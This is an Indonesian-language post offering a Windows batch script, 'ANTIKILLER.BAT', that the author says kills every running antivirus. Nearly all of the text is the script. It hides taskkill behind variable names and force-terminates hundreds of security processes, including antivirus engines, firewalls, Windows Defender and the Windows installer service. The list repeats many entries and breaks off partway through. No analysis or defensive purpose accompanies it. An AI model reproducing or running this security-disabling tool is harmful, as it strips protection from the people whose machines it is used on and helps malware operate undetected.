KILL ANTIVIRUS WITH SCRIPT

Bunuh Antivirus !!! Aneh yaa…Cobain dech….

Nie buat bunuh antivirus salin kode di bawah ini ke Notepad dan simpan sebagai ANTIKILLER.BAT. digunakan untuk membunuh setiap antivirus yang berjalan pada sistem anda.

Code:

@Echo Off
Set finaliza=taskkill
Set limpa=cls
Set registro=reg add
Set apaga=del
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im nod32kui.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im KAVPF.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashWebSv.exe
%limpa%
%finaliza% /f /im ashDisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasDtServ.exe
%limpa%
%finaliza% /f /im MsMpEng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im MsiExec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im zapro.exe
%limpa%
%finaliza% /f /im zauinst.exe
%limpa%
%finaliza% /f /im UpdClient.exe
%limpa%
%finaliza% /f /im zlcliente.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im Norton Auto-Protect.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pccntupd.exe
%limpa%
%finaliza% /f /im PCCTool.exe
%limpa%
%finaliza% /f /im tmproxy.exe
%limpa%
%finaliza% /f /im tmntsrv.exe
%limpa%
%finaliza% /f /im pop3trap.exe
%limpa%
%finaliza% /f /im tsc.exe
%limpa%
%finaliza% /f /im PavPrSrv.exe
%limpa%
%finaliza% /f /im padmin.exe
%limpa%
%finaliza% /f /im PavProt.exe
%limpa%
%finaliza% /f /im pandaav.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webProxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im sched.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im SCCOMM.EXE
%limpa%
%finaliza% /f /im Spiderml.exe
%limpa%
%finaliza% /f /im vsserv.exe
%limpa%
%finaliza% /f /im bdswitch.exe
%limpa%
%finaliza% /f /im bdss.exe
%limpa%
%finaliza% /f /im INOTask.exe
%limpa%
%finaliza% /f /im caissdt.exe
%limpa%
%finaliza% /f /im InoRpc.exe
%limpa%
%finaliza% /f /im VetMsg.exe
%limpa%
%finaliza% /f /im vettray.exe
%limpa%
%finaliza% /f /im realmon.exe
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im nod32kui.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im KAVPF.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashWebSv.exe
%limpa%
%finaliza% /f /im ashDisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasDtServ.exe
%limpa%
%finaliza% /f /im MsMpEng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im MsiExec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im zapro.exe
%limpa%
%finaliza% /f /im zauinst.exe
%limpa%
%finaliza% /f /im UpdClient.exe
%limpa%
%finaliza% /f /im zlcliente.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im Norton Auto-Protect.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pccntupd.exe
%limpa%
%finaliza% /f /im PCCTool.exe
%limpa%
%finaliza% /f /im tmproxy.exe
%limpa%
%finaliza% /f /im tmntsrv.exe
%limpa%
%finaliza% /f /im pop3trap.exe
%limpa%
%finaliza% /f /im tsc.exe
%limpa%
%finaliza% /f /im PavPrSrv.exe
%limpa%
%finaliza% /f /im padmin.exe
%limpa%
%finaliza% /f /im PavProt.exe
%limpa%
%finaliza% /f /im pandaav.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webProxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im sched.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im SCCOMM.EXE
%limpa%
%finaliza% /f /im Spiderml.exe
%limpa%
%finaliza% /f /im vsserv.exe
%limpa%
%finaliza% /f /im bdswitch.exe
%limpa%
%finaliza% /f /im bdss.exe
%limpa%
%finaliza% /f /im INOTask.exe
%limpa%
%finaliza% /f /im caissdt.exe
%limpa%
%finaliza% /f /im InoRpc.exe
%limpa%
%finaliza% /f /im VetMsg.exe
%limpa%
%finaliza% /f /im vettray.exe
%limpa%
%finaliza% /f /im realmon.exe
%limpa%
%finaliza% /F /IM AVGUARD.exe
%limpa%
%finaliza% /F /IM AVGCtrl.exe
%limpa%
%finaliza% /F /IM CSS_1630.exe
%limpa%
%finaliza% /F /IM CSS-AVS.exe
%limpa%
%finaliza% /F /IM ashdisp.exe
%limpa%
%finaliza% /F /IM ashmaisv.exe
%limpa%
%finaliza% /F /IM ashserv.exe
%limpa%
%finaliza% /F /IM ashwebsv.exe
%limpa%
%finaliza% /F /IM aswupdsv.exe
%limpa%
%finaliza% /F /IM AVGCC.exe
%limpa%
%finaliza% /F /IM AVGCC32.exe
%limpa%
%finaliza% /F /IM AVGEmc.exe
%limpa%
%finaliza% /F /IM AVGServ.exe
%limpa%
%finaliza% /F /IM AVGServ9.exe
%limpa%
%finaliza% /F /IM Avgw.exe
%limpa%
%finaliza% /F /IM vsserv.exe
%limpa%
%finaliza% /F /IM ewidoguard.exe
%limpa%
%finaliza% /F /IM ewidoctrl.exe
%limpa%
%finaliza% /F /IM kav.exe
%limpa%
%finaliza% /F /IM kavsvc.exe
%limpa%
%finaliza% /F /IM MPFAgent.exe
%limpa%
%finaliza% /F /IM MPFTray.exe
%limpa%
%finaliza% /F /IM Mscifapp.exe
%limpa%
%finaliza% /F /IM MSKSrvr.exe
%limpa%
%finaliza% /F /IM NOD32Krn.exe
%limpa%
%finaliza% /F /IM NOD32Kui.exe
%limpa%
%finaliza% /F /IM PavPrS9x.exe
%limpa%
%finaliza% /F /IM NPFMntor.exe
%limpa%
%finaliza% /F /IM Nprotect.exe
%limpa%
%finaliza% /F /IM Nsched32.exe
%limpa%
%finaliza% /F /IM SymWSC.exe
%limpa%
%finaliza% /f /IM SpywareStrike.exe /IM SpywareStrike.exe
%limpa%
%finaliza% /f /IM ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
%limpa%
%finaliza% /f /IM symlcsvc.exe
%limpa%
%finaliza% /f /IM SymWSC.exe /IM UsrPrmpt.exe
%limpa%
%finaliza% /f /IM zlclient.exe /IM zonealarm.exe
%limpa%
%finaliza% /f /IM ewidoctrl.exe
%limpa%
%finaliza% /f /IM navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
%limpa%
%finaliza% /f /IM WRSSSDK.exe /IM SpySweeper.exe
%limpa%
%finaliza% /f /IM GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
%limpa%
%finaliza% /f /IM kavsvc.exe /IM kav.exe
%limpa%
%finaliza% /f /IM mcdetect.exe /IM mctskshd.exe /IM mcregwiz.exe /IM mcagent.exe
%limpa%
%finaliza% /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
%limpa%
%finaliza% /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
%limpa%
%finaliza% /f /IM avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
%limpa%
%finaliza% /f /IM Pagent.exe /IM pagentwd.exe /IM pavsched.exe
%limpa%
%finaliza% /f /IM DefWatch.exe /IM Rtvscan.exe
%limpa%
%finaliza% /f /IM avgamsvr.exe /IM avgupsvc.exe
%limpa%
%finaliza% /f /im nod32krn.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im kav.exe
%limpa%
%finaliza% /f /im kavmm.exe
%limpa%
%finaliza% /f /im avgemc.exe
%limpa%
%finaliza% /f /im avgcc.exe
%limpa%
%finaliza% /f /im avgamsvr.exe
%limpa%
%finaliza% /f /im avgupsvc.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im ashwebsv.exe
%limpa%
%finaliza% /f /im ashdisp.exe
%limpa%
%finaliza% /f /im ashmaisv.exe
%limpa%
%finaliza% /f /im ashserv.exe
%limpa%
%finaliza% /f /im ashwebsv.exe
%limpa%
%finaliza% /f /im aswupdsv.exe
%limpa%
%finaliza% /f /im ewidoctrl.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im gcasdtserv.exe
%limpa%
%finaliza% /f /im msmpeng.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mghml.exe
%limpa%
%finaliza% /f /im msiexec.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im isafe.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im zonealarm.exe
%limpa%
%finaliza% /f /im zlclient.exe
%limpa%
%finaliza% /f /im updclient.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im ccsetmgr.exe
%limpa%
%finaliza% /f /im cccproxy.exe
%limpa%
%finaliza% /f /im ccapp.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im npfmntor.exe
%limpa%
%finaliza% /f /im logexprt.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im issvc.exe
%limpa%
%finaliza% /f /im cpdclnt.exe
%limpa%
%finaliza% /f /im pavprsrv.exe
%limpa%
%finaliza% /f /im pavprot.exe
%limpa%
%finaliza% /f /im avengine.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im webproxy.exe
%limpa%
%finaliza% /f /im avguard.exe
%limpa%
%finaliza% /f /im avgnt.exe
%limpa%
%finaliza% /f /im shed.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im sccomm.exe
%limpa%
%finaliza% /f /im spiderml.exe
%limpa%
%finaliza% /f /im sgmain.exe
%limpa%
%finaliza% /f /im spywareguard.exe
%limpa%
%finaliza% /f /im kpf4gui.exe
%limpa%
%finaliza% /f /im kpf4ss.exe
%limpa%
%finaliza% /f /im mcdash.exe
%limpa%
%finaliza% /f /im mcdetect.exe
%limpa%
%finaliza% /f /im mcregwiz.exe
%limpa%
%finaliza% /f /im mcinfo.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im oasclnt.exe
%limpa%
%finaliza% /f /im mpfagent.exe
%limpa%
%finaliza% /f /im mpfconsole.exe
%limpa%
%finaliza% /f /im mpfservice.exe
%limpa%
%finaliza% /f /im mpftray.exe
%limpa%
%finaliza% /f /im mpfwizard.exe
%limpa%
%finaliza% /f /im mvtx.exe
%limpa%
%finaliza% /f /im _avp32.exe
%limpa%
%finaliza% /f /im _avpcc.exe
%limpa%
%finaliza% /f /im _avpm.exe
%limpa%
%finaliza% /f /im ackwin32.exe
%limpa%
%finaliza% /f /im advxdwin.exe
%limpa%
%finaliza% /f /im agentsvr.exe
%limpa%
%finaliza% /f /im agv.exe
%limpa%
%finaliza% /f /im ahnsd.exe
%limpa%
%finaliza% /f /im alertsvc.exe
%limpa%
%finaliza% /f /im alogserv.exe
%limpa%
%finaliza% /f /im amon.exe
%limpa%
%finaliza% /f /im amon9x.exe
%limpa%
%finaliza% /f /im amonavp32.exe
%limpa%
%finaliza% /f /im anti -trojan.exe
%limpa%
%finaliza% /f /im antivir.exe
%limpa%
%finaliza% /f /im antivirus.exe
%limpa%
%finaliza% /f /im ants.exe
%limpa%
%finaliza% /f /im antssircam.exe
%limpa%
%finaliza% /f /im apimonitor.exe
%limpa%
%finaliza% /f /im aplica32.exe
%limpa%
%finaliza% /f /im apvxdwin.exe
%limpa%
%finaliza% /f /im atcon.exe
%limpa%
%finaliza% /f /im atguard.exe
%limpa%
%finaliza% /f /im ats.exe
%limpa%
%finaliza% /f /im atscan.exe
%limpa%
%finaliza% /f /im atupdater.exe
%limpa%
%finaliza% /f /im atwatch.exe
%limpa%
%finaliza% /f /im autodown.exe
%limpa%
%finaliza% /f /im autotrace.exe
%limpa%
%finaliza% /f /im autoupdate.exe
%limpa%
%finaliza% /f /im avconsol.exe
%limpa%
%finaliza% /f /im ave32.exe
%limpa%
%finaliza% /f /im avgcc32.exe
%limpa%
%finaliza% /f /im avgctrl.exe
%limpa%
%finaliza% /f /im avgserv.exe
%limpa%
%finaliza% /f /im avgserv9.exe
%limpa%
%finaliza% /f /im avgserv9schedapp.exe
%limpa%
%finaliza% /f /im avgw.exe
%limpa%
%finaliza% /f /im avkpop.exe
%limpa%
%finaliza% /f /im avkserv.exe
%limpa%
%finaliza% /f /im avkservice.exe
%limpa%
%finaliza% /f /im avkwcl9.exe
%limpa%
%finaliza% /f /im avkwctl9.exe
%limpa%
%finaliza% /f /im avnt.exe
%limpa%
%finaliza% /f /im avp.exe
%limpa%
%finaliza% /f /im avp32.exe
%limpa%
%finaliza% /f /im avpcc.exe
%limpa%
%finaliza% /f /im AVPCC Service.exe
%limpa%
%finaliza% /f /im avpccavpm.exe
%limpa%
%finaliza% /f /im avpdos32.exe
%limpa%
%finaliza% /f /im avpexec.exe
%limpa%
%finaliza% /f /im avpinst.exe
%limpa%
%finaliza% /f /im avpm.exe
%limpa%
%finaliza% /f /im avpmonitor.exe
%limpa%
%finaliza% /f /im avptc.exe
%limpa%
%finaliza% /f /im avptc32.exe
%limpa%
%finaliza% /f /im avpupd.exe
%limpa%
%finaliza% /f /im avpupdates.exe
%limpa%
%finaliza% /f /im avrescue.exe
%limpa%
%finaliza% /f /im avsched32.exe
%limpa%
%finaliza% /f /im avsynmgr.exe
%limpa%
%finaliza% /f /im avwin95.exe
%limpa%
%finaliza% /f /im avwinnt.exe
%limpa%
%finaliza% /f /im avwupd32.exe
%limpa%
%finaliza% /f /im avxgui.exe
%limpa%
%finaliza% /f /im avxinit.exe
%limpa%
%finaliza% /f /im avxlive.exe
%limpa%
%finaliza% /f /im avxmonitor9x.exe
%limpa%
%finaliza% /f /im avxmonitornt.exe
%limpa%
%finaliza% /f /im avxnews.exe
%limpa%
%finaliza% /f /im avxquar.exe
%limpa%
%finaliza% /f /im avxsch.exe
%limpa%
%finaliza% /f /im avxw.exe
%limpa%
%finaliza% /f /im BACKLOG.exe
%limpa%
%finaliza% /f /im bd_professional.exe
%limpa%
%finaliza% /f /im bidef.exe
%limpa%
%finaliza% /f /im bidserver.exe
%limpa%
%finaliza% /f /im bipcp.exe
%limpa%
%finaliza% /f /im bisp.exe
%limpa%
%finaliza% /f /im blackd.exe
%limpa%
%finaliza% /f /im blackice.exe
%limpa%
%finaliza% /f /im blackiceblackd.exe
%limpa%
%finaliza% /f /im BootWarn.exe
%limpa%
%finaliza% /f /im borg2.exe
%limpa%
%finaliza% /f /im bs120.exe
%limpa%
%finaliza% /f /im bullguard.exe
%limpa%
%finaliza% /f /im ccApp.exe
%limpa%
%finaliza% /f /im ccevtmgr.exe
%limpa%
%finaliza% /f /im ccIMScan.exe
%limpa%
%finaliza% /f /im ccPwdSrc.exe
%limpa%
%finaliza% /f /im ccpxysvc.exe
%limpa%
%finaliza% /f /im ccSetMgr.exe
%limpa%
%finaliza% /f /im cdp.exe
%limpa%
%finaliza% /f /im cfiadmin.exe
%limpa%
%finaliza% /f /im cfiaudit.exe
%limpa%
%finaliza% /f /im cfinet.exe
%limpa%
%finaliza% /f /im cfinet32.exe
%limpa%
%finaliza% /f /im claw95.exe
%limpa%
%finaliza% /f /im claw95cf.exe
%limpa%
%finaliza% /f /im clean.exe
%limpa%
%finaliza% /f /im cleaner.exe
%limpa%
%finaliza% /f /im cleaner3.exe
%limpa%
%finaliza% /f /im cleanpc.exe
%limpa%
%finaliza% /f /im cmgrdian.exe
%limpa%
%finaliza% /f /im cmon016.exe
%limpa%
%finaliza% /f /im codered.exe
%limpa%
%finaliza% /f /im connectionmonitor.exe
%limpa%
%finaliza% /f /im conseal.exe
%limpa%
%finaliza% /f /im cpd.exe
%limpa%
%finaliza% /f /im cpf9x206.exe
%limpa%
%finaliza% /f /im ctrl.exe
%limpa%
%finaliza% /f /im defalert.exe
%limpa%
%finaliza% /f /im defence.exe
%limpa%
%finaliza% /f /im defense.exe
%limpa%
%finaliza% /f /im defscangui.exe
%limpa%
%finaliza% /f /im defwatch.exe
%limpa%
%finaliza% /f /im deputy.exe
%limpa%
%finaliza% /f /im doors.exe
%limpa%
%finaliza% /f /im dpf.exe
%limpa%
%finaliza% /f /im drwatson.exe
%limpa%
%finaliza% /f /im drweb32.exe
%limpa%
%finaliza% /f /im dvp95.exe
%limpa%
%finaliza% /f /im dvp95_0.exe
%limpa%
%finaliza% /f /im ecengine.exe
%limpa%
%finaliza% /f /im edisk.exe
%limpa%
%finaliza% /f /im efpeadm.exe
%limpa%
%finaliza% /f /im esafe.exe
%limpa%
%finaliza% /f /im escanh95.exe
%limpa%
%finaliza% /f /im escanhnt.exe
%limpa%
%finaliza% /f /im escanv95.exe
%limpa%
%finaliza% /f /im espwatch.exe
%limpa%
%finaliza% /f /im etrustcipe.exe
%limpa%
%finaliza% /f /im evpn.exe
%limpa%
%finaliza% /f /im exantivirus -cnet.exe
%limpa%
%finaliza% /f /im fameh32.exe
%limpa%
%finaliza% /f /im fast.exe
%limpa%
%finaliza% /f /im fch32.exe
%limpa%
%finaliza% /f /im fih32.exe
%limpa%
%finaliza% /f /im findviru.exe
%limpa%
%finaliza% /f /im firewall.exe
%limpa%
%finaliza% /f /im fix-it.exe
%limpa%
%finaliza% /f /im flowprotector.exe
%limpa%
%finaliza% /f /im fnrb32.exe
%limpa%
%finaliza% /f /im fp -win.exe
%limpa%
%finaliza% /f /im fp -win_trial.exe
%limpa%
%finaliza% /f /im fprot.exe
%limpa%
%finaliza% /f /im frw.exe
%limpa%
%finaliza% /f /im fsaa.exe
%limpa%
%finaliza% /f /im fsav32.exe
%limpa%
%finaliza% /f /im fsav95.exe
%limpa%
%finaliza% /f /im fsave32.exe
%limpa%
%finaliza% /f /im fsgk32.exe
%limpa%
%finaliza% /f /im fsm32.exe
%limpa%
%finaliza% /f /im fsma32.exe
%limpa%
%finaliza% /f /im fsmb32.exe
%limpa%
%finaliza% /f /im fwenc.exe
%limpa%
%finaliza% /f /im gbmenu.exe
%limpa%
%finaliza% /f /im gbpoll.exe
%limpa%
%finaliza% /f /im gedit.exe
%limpa%
%finaliza% /f /im generics.exe
%limpa%
%finaliza% /f /im grief3878.exe
%limpa%
%finaliza% /f /im guard.exe
%limpa%
%finaliza% /f /im guarddog.exe
%limpa%
%finaliza% /f /im HackerEliminator.exe
%limpa%
%finaliza% /f /im iamapp.exe
%limpa%
%finaliza% /f /im iamserv.exe
%limpa%
%finaliza% /f /im iamstats.exe
%limpa%
%finaliza% /f /im ibmasn.exe
%limpa%
%finaliza% /f /im ibmavsp.exe
%limpa%
%finaliza% /f /im icload95.exe
%limpa%
%finaliza% /f /im icloadnt.exe
%limpa%
%finaliza% /f /im icmon.exe
%limpa%
%finaliza% /f /im icsupp95.exe
%limpa%
%finaliza% /f /im icsuppnt.exe
%limpa%
%finaliza% /f /im iface.exe
%limpa%
%finaliza% /f /im ifw2000.exe
%limpa%
%finaliza% /f /im inoculateit.exe
%limpa%
%finaliza% /f /im iomon98.exe
%limpa%
%finaliza% /f /im iparmor.exe
%limpa%
%finaliza% /f /im iris.exe
%limpa%
%finaliza% /f /im isrv95.exe
%limpa%
%finaliza% /f /im jammer.exe
%limpa%
%finaliza% /f /im jedi.exe
%limpa%
%finaliza% /f /im kavpf.exe
%limpa%
%finaliza% /f /im ldnetmon.exe
%limpa%
%finaliza% /f /im ldpromenu.exe
%limpa%
%finaliza% /f /im ldscan.exe
%limpa%
%finaliza% /f /im localnet.exe
%limpa%
%finaliza% /f /im lockdown.exe
%limpa%
%finaliza% /f /im lookout.exe
%limpa%
%finaliza% /f /im luall.exe
%limpa%
%finaliza% /f /im lucomserver.exe
%limpa%
%finaliza% /f /im luspt.exe
%limpa%
%finaliza% /f /im mcafee.exe
%limpa%
%finaliza% /f /im mcagent.exe
%limpa%
%finaliza% /f /im mcmnhdlr.exe
%limpa%
%finaliza% /f /im mcshield.exe
%limpa%
%finaliza% /f /im mcshieldvvstat.exe
%limpa%
%finaliza% /f /im mctool.exe
%limpa%
%finaliza% /f /im mcupdate.exe
%limpa%
%finaliza% /f /im mcvsrte.exe
%limpa%
%finaliza% /f /im mcvsshld.exe
%limpa%
%finaliza% /f /im mgavrtcl.exe
%limpa%
%finaliza% /f /im mgavrte.exe
%limpa%
%finaliza% /f /im mghtml.exe
%limpa%
%finaliza% /f /im mgui.exe
%limpa%
%finaliza% /f /im minilog.exe
%limpa%
%finaliza% /f /im mon.exe
%limpa%
%finaliza% /f /im monitor.exe
%limpa%
%finaliza% /f /im monsys32.exe
%limpa%
%finaliza% /f /im monsysnt.exe
%limpa%
%finaliza% /f /im moolive.exe
%limpa%
%finaliza% /f /im mpfservice.exe
%limpa%
%finaliza% /f /im mpftray.exe
%limpa%
%finaliza% /f /im mrflux.exe
%limpa%
%finaliza% /f /im msinfo32.exe
%limpa%
%finaliza% /f /im mwatch.exe
%limpa%
%finaliza% /f /im mxtask.exe
%limpa%
%finaliza% /f /im n32scanw.exe
%limpa%
%finaliza% /f /im nav.exe
%limpa%
%finaliza% /f /im NAV DefAlert.exe
%limpa%
%finaliza% /f /im nav32.exe
%limpa%
%finaliza% /f /im navalert.exe
%limpa%
%finaliza% /f /im navap.exe
%limpa%
%finaliza% /f /im navapsvc.exe
%limpa%
%finaliza% /f /im NAVAPW32.exe
%limpa%
%finaliza% /f /im navauto -protect.exe
%limpa%
%finaliza% /f /im navdx.exe
%limpa%
%finaliza% /f /im navengnavex15.exe
%limpa%
%finaliza% /f /im navlu32.exe
%limpa%
%finaliza% /f /im navnt.exe
%limpa%
%finaliza% /f /im navrunr.exe
%limpa%
%finaliza% /f /im navstub.exe
%limpa%
%finaliza% /f /im navw32.exe
%limpa%
%finaliza% /f /im Navwnt.exe
%limpa%
%finaliza% /f /im nc2000.exe
%limpa%
%finaliza% /f /im ndd32.exe
%limpa%
%finaliza% /f /im neomonitor.exe
%limpa%
%finaliza% /f /im neowatchlog.exe
%limpa%
%finaliza% /f /im net2000.exe
%limpa%
%finaliza% /f /im netarmor.exe
%limpa%
%finaliza% /f /im netcommando.exe
%limpa%
%finaliza% /f /im netinfo.exe
%limpa%
%finaliza% /f /im netmon.exe
%limpa%
%finaliza% /f /im netpro.exe
%limpa%
%finaliza% /f /im netprotect.exe
%limpa%
%finaliza% /f /im netscanpro.exe
%limpa%
%finaliza% /f /im netspyhunter -1.2.exe
%limpa%
%finaliza% /f /im netstat.exe
%limpa%
%finaliza% /f /im netutils.exe
%limpa%
%finaliza% /f /im netutils].exe
%limpa%
%finaliza% /f /im nimda.exe
%limpa%
%finaliza% /f /im nisserv.exe
%limpa%
%finaliza% /f /im nisum.exe
%limpa%
%finaliza% /f /im nisumnisservnisum.exe
%limpa%
%finaliza% /f /im nmain.exe
%limpa%
%finaliza% /f /im nod32.exe
%limpa%
%finaliza% /f /im norman.exe
%limpa%
%finaliza% /f /im norman_32.exe
%limpa%
%finaliza% /f /im norman_av.exe
%limpa%
%finaliza% /f /im norman32.exe
%limpa%
%finaliza% /f /im normanav.exe
%limpa%
%finaliza% /f /im normist.exe
%limpa%
%finaliza% /f /im norton.exe
%limpa%
%finaliza% /f /im Norton Auto-Protect.exe
%limpa%
%finaliza% /f /im norton_av.exe
%limpa%
%finaliza% /f /im nortonav.exe
%limpa%
%finaliza% /f /im notstart.exe
%limpa%
%finaliza% /f /im npfmessenger.exe
%limpa%
%finaliza% /f /im npfw.exe
%limpa%
%finaliza% /f /im npfw32.exe
%limpa%
%finaliza% /f /im nprotect.exe
%limpa%
%finaliza% /f /im npscheck.exe
%limpa%
%finaliza% /f /im npssvc.exe
%limpa%
%finaliza% /f /im nresq32.exe
%limpa%
%finaliza% /f /im nsched32.exe
%limpa%
%finaliza% /f /im nschednt.exe
%limpa%
%finaliza% /f /im nsplugin.exe
%limpa%
%finaliza% /f /im ntrtscan.exe
%limpa%
%finaliza% /f /im ntvdm.exe
%limpa%
%finaliza% /f /im ntxconfig.exe
%limpa%
%finaliza% /f /im nui.exe
%limpa%
%finaliza% /f /im nupgrade.exe
%limpa%
%finaliza% /f /im nvarch16.exe
%limpa%
%finaliza% /f /im nvc95.exe
%limpa%
%finaliza% /f /im nvsvc32.exe
%limpa%
%finaliza% /f /im nwservice.exe
%limpa%
%finaliza% /f /im nwtool16.exe
%limpa%
%finaliza% /f /im offguard.exe
%limpa%
%finaliza% /f /im OPScan.exe
%limpa%
%finaliza% /f /im ostronet.exe
%limpa%
%finaliza% /f /im outpost.exe
%limpa%
%finaliza% /f /im padmin.exe
%limpa%
%finaliza% /f /im panda.exe
%limpa%
%finaliza% /f /im pandaav.exe
%limpa%
%finaliza% /f /im panixk.exe
%limpa%
%finaliza% /f /im pav.exe
%limpa%
%finaliza% /f /im pavcl.exe
%limpa%
%finaliza% /f /im pavproxy.exe
%limpa%
%finaliza% /f /im pavsched.exe
%limpa%
%finaliza% /f /im pavw.exe
%limpa%
%finaliza% /f /im pc -cillan.exe
%limpa%
%finaliza% /f /im pc -cillin.exe
%limpa%
%finaliza% /f /im pccclient.exe
%limpa%
%finaliza% /f /im pccguide.exe
%limpa%
%finaliza% /f /im pcciomon.exe
%limpa%
%finaliza% /f /im pccntmon.exe
%limpa%
%finaliza% /f /im pccwin97.exe
%limpa%
%finaliza% /f /im pccwin98.exe
%limpa%
%finaliza% /f /im pcfwallicon.exe
%limpa%
%finaliza% /f /im pcscan.exe
%limpa%
%finaliza% /f /im periscope.exe
%limpa%
%finaliza% /f /im persfw.exe
%limpa%
%finaliza% /f /im pf2.exe
%limpa%
%finaliza% /f /im pfwadmin.exe
%limpa%
%finaliza% /f /im pingscan.exe
%limpa%
%finaliza% /f /im platin.exe
%limpa%
%finaliza% /f /im pop3trap.exe
%limpa%
%finaliza% /f /im poproxy.exe
%limpa%
%finaliza% /f /im portdetective.exe
%limpa%
%finaliza% /f /im portmonitor.exe
%limpa%
%finaliza% /f /im ppinupdt.exe
%limpa%
%finaliza% /f /im pptbc.exe
